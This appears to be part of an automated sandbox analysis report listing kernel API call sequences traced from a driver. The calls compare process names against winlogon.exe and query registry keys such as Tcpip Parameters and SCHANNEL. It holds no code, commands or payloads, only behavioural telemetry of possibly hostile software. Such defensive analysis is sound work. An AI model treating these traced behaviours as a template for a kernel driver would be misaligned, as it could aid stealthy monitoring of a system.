| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #192 (length: 82, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 82 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 |
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
Execution Path #168 (length: 189, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 189 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
